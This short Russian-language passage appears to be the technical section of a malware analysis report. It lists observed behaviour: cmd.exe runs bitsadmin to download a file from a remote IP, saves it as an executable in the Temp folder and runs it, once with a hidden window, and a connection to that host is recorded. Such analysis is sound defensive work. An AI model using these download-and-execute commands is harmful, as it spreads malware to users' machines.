Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://191.96.249.70/confirm.zp" "%LOCALAPPDATA%\Temp/AJdwea.exe" && "%LOCALAPPDATA%\Temp/AJdwea.exe"
- '19#.#6.249.70':80
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://191.96.249.70/confirm.zp" "%LOCALAPPDATA%\Temp/AJdwea.exe" && "%LOCALAPPDATA%\Temp/AJdwea.exe"' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://191.96.249.70/confirm.zp" "%LOCALAPPDATA%\Temp/AJdwea.exe"